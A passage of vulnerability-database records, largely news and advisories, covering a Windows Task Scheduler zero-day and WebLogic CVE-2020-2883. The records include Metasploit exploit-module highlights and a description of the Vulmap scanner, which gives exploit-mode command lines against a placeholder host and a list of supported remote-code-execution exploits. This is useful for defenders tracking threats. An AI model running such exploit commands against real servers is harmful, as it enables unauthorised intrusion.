The bug would allow LPE via importing legacy tasks from other systems into the Task Scheduler utility.\n\nMitja Kolsek, co-founder of 0patch and CEO of Arcos Security, told Threatpost that the bug (which he dubbed \u201cBearLPE\u201d after SandboxEscaper\u2019s Polar Bear-related blog title) is in most ways a typical LPE flaw; it allows a low-privileged user on the computer to arbitrarily modify any file, including system executables.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cSince these are executed in high-privileged context, the attacker\u2019s code can get executed and, for instance, promote the attacker to local administrator or obtain covert persistence on the computer,\u201d said Kolsek.\n\nHowever, there\u2019s more to it than that. While successful exploitation requires that the attacker must know a valid username and password on the target computer (requiring some reconnaissance or a lucky guess of a Windows domain user\u2019s credentials), the attack gives an adversary access to highly privileged files that usually only SYSTEM and TrustedInstaller have ownership over. It could also realistically be chained with comparatively more common and cheap exploits for remote access, researchers told Threatpost \u2013 making it a potentially very dangerous flaw.\n\nThe micropatch addresses the issue by cutting off a remote procedure call (RPC) called \u201cSchRpcSetSecurity.\u201d The original exploit works by making an RPC call to \u201cSchRpcRegisterTask,\u201d which is exposed by the Task Scheduler service. 
However, in tweaking this function to thwart the exploit, 0patch discovered that a call is made to the also-exposed \u201cSchRpcSetSecurity\u201d if the original call to \u201cSchRpcRegisterTask\u201d fails \u2013 which SandboxEscaper uses as a kind of back-up mechanism to ensure successful exploitation.\n\n\u201cIt looked like some monitoring thread was used for getting the job done when the original call failed, but this thread was not called via RPC, and client impersonation could not be used there,\u201d explained Kolsek, in [a posting](<https://blog.0patch.com/2019/06/another-task-scheduler-0day-another.html>) on Tuesday. \u201cWe therefore decided on a more drastic approach and simply amputated the call to SetSecurity\u2026after that, we got the desired behavior.\u201d He added, \u201cSince we didn\u2019t even touch schedsvc.dll, the new (non-legacy) Task Scheduler functionality was not affected at all.\u201d\n\nThe micropatch is available for Windows 10 machines only \u2013 but there\u2019s a reason for that.\n\n\u201cWhile Windows 8 still contains this vulnerability, exploitation using the publicly-described technique is limited to files where the current user has write access, in our testing,\u201d Kolsek said. \u201cAs such, the impact on Windows 8 systems using the technique used by the public exploit appears to be negligible. We have not been able to demonstrate the vulnerability on Windows 7 systems.\u201d\n\nThe exploit for the flaw was the first in a string of recent exploits from SandboxEscaper, who said that she\u2019d like to sell these kinds of weapon for $60,000 to non-Western buyers (as of this writing, the exploit code has been removed from Github). Shortly after making the BearLPE exploit public, she [released three more plus an exploit for a Windows Internet Explorer bug](<https://threatpost.com/sandboxescaper-more-exploits-ie-zero-day/145010/>). 
Of these, 0patch is only working on one fix.\n\n\u201c\u2018[angrypolarbearbug2](<https://portal.msrc.microsoft.com/en-us/security-guidance/en-us/security-guidance/advisory/CVE-2019-0863>)\u2018 is not a 0day, as it was fixed by May 2019 Windows Updates,\u201d a spokesperson said via email. \u201cInstallerBypass \u2013 we were unable to reproduce it and know of no one being successful at that (it could be just really difficult to reproduce, or depending on some external factors that were not present in our testing environment); and \u2018sandboxescape\u2019 we were able to reproduce but don\u2019t consider it a critical enough bug for micropatching.\u201d\n\nThe fourth is a bypass bug that 0patch was able to verify and is analyzing for micropatching. It\u2019s a bypass for a previously released patch addressing a Windows permissions-overwrite, privilege-escalation flaw ([CVE-2019-0841](<https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/>)). The bug exists because Windows AppX Deployment Service (AppXSVC) improperly handles hard links.\n\nSandboxEscaper has a history of releasing fully functional Windows zero-days. Last August, she [debuted another Task Scheduler flaw](<https://threatpost.com/microsoft-windows-zero-day-found-in-task-scheduler/136977/>) on Twitter, which was quickly [exploited in the wild](<https://threatpost.com/active-spy-campaign-exploits-unpatched-windows-zero-day/137237/>) in a spy campaign just two days after disclosure.\n\nIn October, SandboxEscaper [released an exploit](<https://threatpost.com/windows-deletebug-zero-day-allows-privilege-escalation-destruction/138550/>) for what was dubbed the \u201cDeletebug\u201d flaw, found in Microsoft\u2019s Data Sharing Service (dssvc.dll). 
And towards the end of 2018 she [offered up two more](<https://threatpost.com/microsoft-windows-rce-flaw-gets-temporary-micropatch/141067/>): The \u201cangrypolarberbug,\u201d which allows a local unprivileged process to overwrite any chosen file on the system; and a vulnerability that allows an unprivileged process running on a Windows computer to obtain the content of an arbitrary file \u2013 even if permissions on such file don\u2019t allow it read access.\n", "cvss3": {}, "published": "2019-06-04T20:19:06", "type": "threatpost", "title": "Zero-Day No More: Windows Bug Gets a Fix", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0841", "CVE-2019-0863", "CVE-2020-2883"], "modified": "2019-06-04T20:19:06", "id": "THREATPOST:63A1257305C8D791D6442D45DCD7142B", "href": "https://threatpost.com/zero-day-sandboxescaper-windows-fix/145337/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:25:45", "description": "Oracle is urging customers to fast-track a patch for a critical flaw in its WebLogic Server under active attack. The company said it has received numerous reports that attackers were targeting the vulnerability [patched last month](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>).\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. 
The server has a remote code execution flaw, CVE-2020-2883, that can be exploited by unauthenticated attackers to take over unpatched systems.\n\nEric Maurice, director of security assurance, said [in a post last week](<https://blogs.oracle.com/security/apply-april-2020-cpu>) that the flaw was addressed in [Oracle\u2019s April 2020 Critical Patch Update](<https://threatpost.com/oracle-tackles-405-bugs-for-april-quarterly-patch-update/154737/>), which fixed 405 flaws, including 286 that were remotely exploitable across nearly two dozen product lines.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches,\u201d according to Oracle\u2019s security update. \u201cIn some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.\u201d\n\nShortly before Oracle\u2019s warning of the active exploits, proof of concept exploit code [was also published](<https://github.com/hktalent/CVE_2020_2546>) by a researcher (under the alias \u201chktalent\u201d) on GitHub for the flaw last week.\n\nAccording to Trend Micro\u2019s Zero Day Initiative, the flaw [ranks 9.8 out of 10](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-2883>) on the CVSSv3 scale, making it critical severity. Two variants of the flaw were reported. The [first variant of the flaw](<https://www.zerodayinitiative.com/advisories/ZDI-20-504/>) exists within the handling of the T3 protocol, which is used to transport information between WebLogic servers and other types of Java programs. 
According to ZDI, crafted data in a T3 protocol message can trigger the deserialization of untrusted data \u2013 allowing an attacker to execute code in the context of the current process.\n\nThe second variant of the flaw exists within [the Oracle Coherence library](<https://www.zerodayinitiative.com/advisories/ZDI-20-570/>), Oracle\u2019s in-memory data grid and distributed caching solution.\n\n\u201cThe issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data,\u201d according to ZDI. \u201cAn attacker can leverage this vulnerability to execute code in the context of the service account.\u201d\n\nAffected versions of WebLogic Server include versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.\n\nOracle did not disclose further details about how many were targeted or the attackers behind the hacks.\n\nOracle WebLogic servers continue to be hard hit with exploits. In May 2019, researchers warned that [malicious activity](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) exploiting a recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) was surging \u2013 including to spread the \u201c[Sodinokibi\u201d ransomware](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>). In June 2019, Oracle said that a critical remote code execution flaw in its WebLogic Server ([CVE-2019-2729](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html>)) was being actively exploited in the wild.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. [On May 13 at 2 p.m. 
ET](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>), join Valimail security experts and Threatpost for a FREE webinar, [5 Proven Strategies to Prevent Email Compromise](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>). Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please [register here ](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-04T14:57:51", "type": "threatpost", "title": "Oracle: Unpatched Versions of WebLogic App Server Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2883"], "modified": "2020-05-04T14:57:51", "id": "THREATPOST:15EF9F86D0EEBCD1CD450BF55954D1D2", "href": "https://threatpost.com/oracle-unpatched-versions-of-weblogic-app-server-under-active-attack/155420/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T15:18:49", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). 
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-15T14:15:00", "type": "cve", "title": "CVE-2020-2883", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2883"], "modified": "2022-10-14T18:23:00", "cpe": ["cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:weblogic_server:12.2.1.4.0"], "id": "CVE-2020-2883", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:15:46", "description": "Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 02, 2020 12:18am UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\n**space-r7** at May 15, 2020 7:15pm UTC reported:\n\nWell, it\u2019s bad when even _Oracle_ decides to [raise the alarm bells](<https://blogs.oracle.com/security/apply-april-2020-cpu>) (wayback machine was down, so no permalink yet) about it.\n\nThey\u2019ve detected active exploitation attempts against WebLogic servers.\n\nT3 is Weblogic\u2019s proprietary implementation of the RMI spec and is primarily used as a layer to enable JNDI calls by apps/clients.\n\nIt appears there\u2019s [PoC for it](<https://github.com/hktalent/CVE_2020_2546>) but I haven\u2019t tested it yet. 
Since it\u2019s yet-another deserialization vulnerability and there\u2019s existing PoC code for similar RMI RCE, Oracle\u2019s observations are likely correct.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-15T00:00:00", "type": "attackerkb", "title": "CVE-2020-2883", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2555", "CVE-2020-2883"], "modified": "2020-07-30T00:00:00", "id": "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "href": "https://attackerkb.com/topics/Y21wr47Bk3/cve-2020-2883", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:30", "description": "An insecure deserialization vulnerability exists in the Oracle WebLogic Server. The vulnerability is due to the lack of input validation by the servlet. 
A successful attack could result in the execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-05-04T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Fusion Middleware WebLogic Server Insecure Deserialization (CVE-2020-2883; CVE-2020-2546; CVE-2020-2798; CVE-2020-2801; CVE-2020-2884)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-2546", "CVE-2020-2798", "CVE-2020-2801", "CVE-2020-2883", "CVE-2020-2884"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2020-0332", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-01-04T16:47:13", "description": "\n\n2020 was certainly an interesting year. There were quite a few newsworthy events and some fantastic exploit content released. 
Let\u2019s take a look at what 2020 meant for [Metasploit](<https://www.metasploit.com/>).\n\n## Quick stats\n\nSome quick statistics for Metasploit\u2019s year.\n\n * 737 pull requests merged (and counting)\n * A net gain of +179 non-payload modules\n * 50 new Auxiliary modules\n * 134 new Exploit modules\n * 23 new Post modules\n * 2 CTFs hosted\n * 1 new version\n\n## Metasploit 6\n\nThe Metasploit team [released version 6.0](<https://blog.rapid7.com/2020/08/06/metasploit-6-now-under-active-development/>) of the framework over the summer. This major change brought quite a few improvements on two fronts: the Meterpreter transport protocol and SMBv3 support for client connections. Both of these offered transport encryption for common operations performed by Metasploit, providing better security for the users. Additionally, to showcase the SMBv3 support, Metasploit added a [new module](<https://github.com/rapid7/metasploit-framework/pull/13995>) to perform agentless dumping of SAM hashes and LSA secrets (including cached creds) from remote Windows targets. The technique employed by this module has become very popular due to its reliability, and the native integration into the Metasploit Framework makes it easily accessible for users with all the related benefits like database and pivoting support.\n\n## CTFs\n\nThere were not one but two open CTFs hosted by the Metasploit team in 2020. These events invited the community to solve challenges in a fun and competitive environment. The [most recent event](<https://blog.rapid7.com/2020/12/07/congrats-to-the-winners-of-the-2020-december-metasploit-community-ctf/>) included 1,903 users registered across 874 teams.\n\n## New module highlights\n\n * **exploit/windows/local/anyconnect_lpe (CVE-2020-3153 & CVE-2020-3433)** \\- This exploit module was an excellent example of a trend of patch bypasses this year. 
The module is capable of leveraging both the original vulnerability along with the bypass for maximum coverage.\n * **exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move (CVE-2020-0787)** \\- This exploit targeted Windows BITS to overwrite a DLL. Exploiting native services included on Windows is always useful, and the technique leveraged here to use the file system operation to obtain code execution was an interesting case.\n * **post/multi/gather/enum_software_versions **\\- It\u2019s often important for users to know what is on a system they have compromised. This new module helps make that process simple by enumerating the installed software and their versions, allowing the user to identify interesting entries for exploitation or living-off-the-land techniques.\n * **exploit/multi/misc/weblogic_deserialize_badattrval (CVE-2020-2555) **\\- WebLogic is always a valuable target and deserialization vulnerabilities are quite reliable by nature. That combination makes this module particularly useful.\n * **exploit/multi/misc/weblogic_deserialize_badattr_extcomp (CVE-2020-2883)** \\- Another more recent WebLogic RCE that makes use of deserialization. Similar to CVE-2020-2555, this module is equally useful.\n * **exploit/windows/local/cve_2020_0668_service_tracing (CVE-2020-0668) **\\- Users can never have enough Windows LPE exploits, and this module offered another reliable vector. This module uses a simple DLL-based technique to obtain code execution from a file system operation.\n\n## SharePoint\n\nMetasploit added its first exploits for the popular SharePoint platform since 2010. Four exploit modules were added, three leverage XML injection flaws while the fourth targets a server side include. These exploits leverage .NET deserialization to execute operating system commands, avoiding any kind of memory corruption and making exploitation relatively reliable. The .NET deserialization gadgets leveraged by these modules were also new in 2020. 
This functionality came in the form of a [new library](<https://github.com/rapid7/metasploit-framework/wiki/.NET-Deserialization>) that even includes a command line tool for generating gadget chains for researchers.\n\n## Interesting trends\n\nOver the course of the year, there were some interesting patterns that were observable. In general, there seemed to have been an increase in vulnerabilities that were disclosed and related to an insufficient remediation for a previous vulnerability. These so-called patch bypasses seem to be indicative of the increasing complexity of vulnerabilities and their respective solutions. Additionally, there were multiple exploits added to Metasploit that leveraged vulnerable file system operations to obtain code execution on Windows. These LPEs used a combination of techniques that are becoming increasingly common including op-locks and junctions. Metasploit is working on better support for these primitives to facilitate exploitation of vulnerabilities that use them.\n\nWith all that the project accomplished in 2020, the team looks forward to what 2021 will hold. New features are [being discussed](<https://github.com/rapid7/metasploit-framework/discussions>), and as always, the module pipeline continues to flow. 
Our sincere gratitude goes to all the members of the community that contributed to the project this year.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n### More HaXmas blogs\n\n * [Help Others Be \"Cyber Aware\" This Festive Season\u2014And All Year Round!](<https://blog.rapid7.com/2020/12/17/help-others-be-cyber-aware-this-festive-season-and-all-year-round/>)\n * [UPnP With a Holiday Cheer](<https://blog.rapid7.com/2020/12/22/upnp-with-a-holiday-cheer/>)\n * [Metasploit Tips and Tricks for HaXmas 2020](<https://blog.rapid7.com/2020/12/23/metasploit-tips-and-tricks-for-haxmas-2020-2/>)\n * [Top Security Recommendations for 2021](<https://blog.rapid7.com/2020/12/24/top-security-recommendations-for-2021/>)\n * [Rapid7 Labs\u2019 2020 Naughty List Summary Report to Santa](<https://blog.rapid7.com/2020/12/25/rapid7-labs-2020-naughty-list-summary-report-to-santa/>)\n * [Taking Inspiration from Our Security Nation in an Otherwise Uninspiring Year](<https://blog.rapid7.com/2020/12/28/taking-inspiration-from-our-security-nation-in-an-otherwise-uninspiring-year/>)\n * [Predicting the Unpredictable: What Will the Cybersecurity Space Look Like in 2021?](<https://blog.rapid7.com/2021/01/02/predicting-the-unpredictable-what-will-the-cybersecurity-space-look-like-in-2021/>)\n * [HaXmas Hardware Hacking](<https://blog.rapid7.com/2021/01/02/haxmas-hardware-hacking/>)", "cvss3": {}, "published": "2020-12-30T15:38:00", "type": "rapid7blog", "title": "Metasploit 2020 Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0668", "CVE-2020-0787", "CVE-2020-2555", "CVE-2020-2883", "CVE-2020-3153", "CVE-2020-3433"], "modified": "2020-12-30T15:38:00", "id": "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "href": "https://blog.rapid7.com/2020/12/30/metasploit-2020-wrap-up/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:02:21", "description": 
"[](<https://1.bp.blogspot.com/-KABdDCvkQwg/X-K8tydG2pI/AAAAAAAAUvc/dR5VJ69ZRm8wEgBjOLkEBdJ3-MPZhg0TQCNcBGAsYHQ/s678/vulmap.png>)\n\n \n\n\nVulmap is a vulnerability scanning tool that can scan for vulnerabilities in Web containers, Web servers, Web middleware, and CMS and other Web programs, and has vulnerability exploitation functions. Relevant testers can use vulmap to detect whether the target has a specific vulnerability, and can use the vulnerability exploitation function to verify whether the vulnerability actually exists.\n\nVulmap currently has vulnerability scanning (poc) and exploiting (exp) modes. Use \"-m\" to select which mode to use, and the default poc mode is the default. In poc mode, it also supports \"-f\" batch target scanning, \"-o\" File output results and other main functions, Other functions [Options](<https://github.com/zhzyker/vulmap/#options>) Or python3 vulmap.py -h, the Poc function will no longer be provided in the exploit exploit mode, but the exploit will be carried out directly, and the exploit result will be fed back to further verify whether the vulnerability exists and whether it can be exploited.\n\n**Try to use \"-a\" to establish target types to reduce false positives, such as \"-a solr\"**\n\n \n\n\n### Installation\n\nThe operating system must have python3, python3.7 or higher is recommended\n\n * Installation dependency\n \n \n pip3 install -r requirements.txt\n \n\n * Linux & MacOS & Windows\n \n \n python3 vulmap.py -u http://example.com\n \n\n \n\n\n### Options\n \n \n optional arguments:\n -h, --help show this help message and exit\n -u URL, --url URL Target URL (e.g. -u \"http://example.com\")\n -f FILE, --file FILE Select a target list file, and the url must be distinguished by lines (e.g. -f \"/home/user/list.txt\")\n -m MODE, --mode MODE The mode supports \"poc\" and \"exp\", you can omit this option, and enter poc mode by default\n -a APP, --app APP Specify a web app or cms (e.g. -a \"weblogic\"). 
default scan all\n -c CMD, --cmd CMD Custom RCE vuln command, Other than \"netstat -an\" and \"id\" can affect program judgment. defautl is \"netstat -an\"\n -v VULN, --vuln VULN Exploit, Specify the vuln number (e.g. -v \"CVE-2020-2729\")\n --list Displays a list of vulnerabilities that support scanning\n --debug Debug mode echo request and responses\n --delay DELAY Delay check time, default 0s\n --timeout TIMEOUT Scan timeout time, default 10s\n --output FILE Text mode export (e.g. -o \"result.txt\")\n \n\n \n\n\n### Examples\n\nTest all vulnerabilities poc mode\n \n \n python3 vulmap.py -u http://example.com\n \n\nFor RCE vuln, use the \"id\" command to test the vuln, because some linux does not have the \"netstat -an\" command\n \n \n python3 vulmap.py -u http://example.com -c \"id\"\n \n\nCheck <http://example.com> for struts2 vuln\n \n \n python3 vulmap.py -u http://example.com -a struts2\n \n \n \n python3 vulmap.py -u http://example.com -m poc -a struts2\n \n\nExploit the CVE-2019-2729 vuln of WebLogic on <http://example.com:7001>\n \n \n python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n \n \n \n python3 vulmap.py -u http://example.com:7001 -m exp -v CVE-2019-2729\n \n\nBatch scan URLs in list.txt\n \n \n python3 vulmap.py -f list.txt\n \n\nExport scan results to result.txt\n \n \n python3 vulmap.py -u http://example.com:7001 -o result.txt\n \n\n \n\n\n### Vulnerabilitys List\n\nVulmap supported vulnerabilities are as follows\n \n \n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |\n +-------------------+------------------+-----+-----+-------------------------------------------------------------+\n | Apache Shiro | CVE-2016-4437 | Y | Y | <= 1.2.4, shiro-550, rememberme deserialization rce |\n | Apache Solr | CVE-2017-12629 | Y | Y | < 7.1.0, runexecutablelistener rce & xxe, only rce is here 
|\n | Apache Solr | CVE-2019-0193 | Y | N | < 8.2.0, dataimporthandler module remote code execution |\n | Apache Solr | CVE-2019-17558 | Y | Y | 5.0.0 - 8.3.1, velocity response writer rce |\n | Apache Struts2 | S2-005 | Y | Y | 2.0.0 - 2.1.8.1, cve-2010-1870 parameters interceptor rce |\n | Apache Struts2 | S2-008 | Y | Y | 2.0.0 - 2.3.17, debugging interceptor rce |\n | Apache Struts2 | S2-009 | Y | Y | 2.1.0 - 2.3.1.1, cve-2011-3923 ognl interpreter rce |\n | Apache Struts2 | S2-013 | Y | Y | 2.0.0 - 2.3.14.1, cve-2013-1966 ognl interpreter rce |\n | Apache Struts2 | S2-015 | Y | Y | 2.0.0 - 2.3.14.2, cve-2013-2134 ognl interpreter rce |\n | Apache Struts2 | S2-016 | Y | Y | 2.0.0 - 2.3.15, cve-2013-2251 ognl interpreter rce |\n | Apache Struts2 | S2-029 | Y | Y | 2.0.0 - 2.3.24.1, ognl interpreter rce |\n | Apache Struts2 | S2-032 | Y | Y | 2.3.20-28, cve-2016-3081 rce can be performed via method |\n | Apache Struts2 | S2-045 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-046 | Y | Y | 2.3.5-31, 2.5.0-10, cve-2017-5638 jakarta multipart rce |\n | Apache Struts2 | S2-048 | Y | Y | 2.3.x, cve-2017-9791 struts2-struts1-plugin rce |\n | Apache Struts2 | S2-052 | Y | Y | 2.1.2 - 2.3.33, 2.5 - 2.5.12 cve-2017-9805 rest plugin rce |\n | Apache Struts2 | S2-057 | Y | Y | 2.0.4 - 2.3.34, 2.5.0-2.5.16, cve-2018-11776 namespace rce |\n | Apache Struts2 | S2-059 | Y | Y | 2.0.0 - 2.5.20 cve-2019-0230 ognl interpreter rce |\n | Apache Struts2 | S2-devMode | Y | Y | 2.1.0 - 2.5.1, devmode remote code execution |\n | Apache Tomcat | Examples File | Y | N | all version, /examples/servlets/servlet/SessionExample |\n | Apache Tomcat | CVE-2017-12615 | Y | Y | 7.0.0 - 7.0.81, put method any files upload |\n | Apache Tomcat | CVE-2020-1938 | Y | Y | 6, 7 < 7.0.100, 8 < 8.5.51, 9 < 9.0.31 arbitrary file read |\n | Drupal | CVE-2018-7600 | Y | Y | 6.x, 7.x, 8.x, drupalgeddon2 remote code execution |\n | Drupal | CVE-2018-7602 | Y | Y | < 
